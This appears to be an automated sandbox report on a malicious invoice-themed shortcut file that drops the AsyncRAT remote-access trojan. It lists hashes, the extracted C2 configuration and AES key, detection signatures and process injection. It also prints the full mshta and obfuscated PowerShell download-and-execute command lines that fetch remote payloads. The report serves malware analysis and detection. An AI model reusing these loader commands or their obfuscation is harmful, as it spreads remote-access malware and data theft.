Analysis
- max time kernel: 62s
- max time network: 145s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 24-07-2021 11:04
- Static task: static1
- Behavioral task: behavioral1
  - Sample: Invoice#333210.lnk
  - Resource: win7v20210410
General
- Target: Invoice#333210.lnk
- Size: 1KB
- MD5: fd00b923c37b36bfda9a7d78e370f4fc
- SHA1: a2f41a4e6f6778b8232054531f58aa083bcc455b
- SHA256: 9d5eef4b39df0149096f70bde04f9704e0740e93b1f7911d1ad7a79fb7918cf8
- SHA512: b010dae295e3b2a25e158ff2b99d22c762d4b0f3fec6d8eb1a64b63946d7b6852254f955d7a377d40b4e77761b7a9017c8e1e0025b618be5eb49dde8834042c9
Malware Config
- Extracted: https://ia601405.us.archive.org/29/items/async-rat-stealer-hta-23456789/AsyncRAT_stealer_hta_23456789.txt
- Extracted: https://ia601503.us.archive.org/0/items/asyncRAT_stealer_all_32456789/asyncRAT_stealer_all_32456789.txt
- Extracted: asyncrat (version 0.5.7B, C2 103.147.184.73:7920, mutex AsyncMutex_6SI8OkPnk)
  - aes_key: 1DM6U4ipQ53iwuPgxDRkDV4Ly78xKAPF
  - anti_detection: false
  - autorun: false
  - bdos: false
  - delay: Default
  - host: 103.147.184.73
  - hwid: 3
  - install_file:
  - install_folder: %AppData%
  - mutex: AsyncMutex_6SI8OkPnk
  - pastebin_config: null
  - port: 7920
  - version: 0.5.7B
Signatures
- suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
- Async RAT payload (2 IoCs)
  Resources matched by yara_rule:
  - behavioral2/memory/2728-143-0x0000000000400000-0x0000000000412000-memory.dmp: asyncrat
  - behavioral2/memory/2728-144-0x000000000040C71E-mapping.dmp: asyncrat
- Blocklisted process makes network request (5 IoCs)
  Processes (flow, pid, process):
  - flow 9, pid 2352, mshta.exe
  - flow 11, pid 2352, mshta.exe
  - flow 13, pid 2352, mshta.exe
  - flow 18, pid 2232, powershell.exe
  - flow 24, pid 2232, powershell.exe
- Suspicious use of SetThreadContext (2 IoCs)
  Processes (description, pid, process, target process):
  - PID 2232 set thread context of 2728: pid 2232 powershell.exe, target aspnet_compiler.exe
  - PID 2232 set thread context of 2608: pid 2232 powershell.exe, target aspnet_compiler.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  Processes (pid, process):
  - pid 2608, aspnet_compiler.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (pid, process):
  - pid 2232, powershell.exe (3 entries)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process):
  - Token: SeDebugPrivilege, pid 2232, powershell.exe
  - Token: SeDebugPrivilege, pid 2728, aspnet_compiler.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description, pid, process, target process):
  - PID 2752 wrote to memory of 2352: pid 2752 cmd.exe, target mshta.exe (2 entries)
  - PID 2352 wrote to memory of 2232: pid 2352 mshta.exe, target powershell.exe (2 entries)
  - PID 2232 wrote to memory of 2728: pid 2232 powershell.exe, target aspnet_compiler.exe (8 entries)
  - PID 2232 wrote to memory of 2608: pid 2232 powershell.exe, target aspnet_compiler.exe (8 entries)
Processes
- [1] C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice#333210.lnk
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" "https://ia601405.us.archive.org/29/items/async-rat-stealer-hta-23456789/AsyncRAT_stealer_hta_23456789.txt"
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601503.us.archive.org/0/items/asyncRAT_stealer_all_32456789/asyncRAT_stealer_all_32456789.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        - Suspicious behavior: AddClipboardFormatListener
Downloads
- memory/2232-116-0x0000000000000000-mapping.dmp
- memory/2232-121-0x00000173F3D80000-0x00000173F3D81000-memory.dmp (Filesize 4KB)
- memory/2232-124-0x00000173F3F30000-0x00000173F3F31000-memory.dmp (Filesize 4KB)
- memory/2232-129-0x00000173F3D70000-0x00000173F3D72000-memory.dmp (Filesize 8KB)
- memory/2232-130-0x00000173F3D73000-0x00000173F3D75000-memory.dmp (Filesize 8KB)
- memory/2232-131-0x00000173F3D76000-0x00000173F3D78000-memory.dmp (Filesize 8KB)
- memory/2232-142-0x00000173F3F00000-0x00000173F3F0E000-memory.dmp (Filesize 56KB)
- memory/2352-114-0x0000000000000000-mapping.dmp
- memory/2608-154-0x0000000005260000-0x0000000005261000-memory.dmp (Filesize 4KB)
- memory/2608-148-0x0000000000400000-0x0000000000408000-memory.dmp (Filesize 32KB)
- memory/2608-149-0x0000000000402DAE-mapping.dmp
- memory/2608-156-0x0000000004E00000-0x0000000004E01000-memory.dmp (Filesize 4KB)
- memory/2608-157-0x0000000004DA0000-0x0000000004DA1000-memory.dmp (Filesize 4KB)
- memory/2608-158-0x0000000004D50000-0x0000000004D51000-memory.dmp (Filesize 4KB)
- memory/2728-144-0x000000000040C71E-mapping.dmp
- memory/2728-143-0x0000000000400000-0x0000000000412000-memory.dmp (Filesize 72KB)
- memory/2728-159-0x00000000010D0000-0x00000000010D1000-memory.dmp (Filesize 4KB)
- memory/2728-160-0x0000000005A50000-0x0000000005A51000-memory.dmp (Filesize 4KB)
- memory/2728-162-0x0000000005AF0000-0x0000000005AF1000-memory.dmp (Filesize 4KB)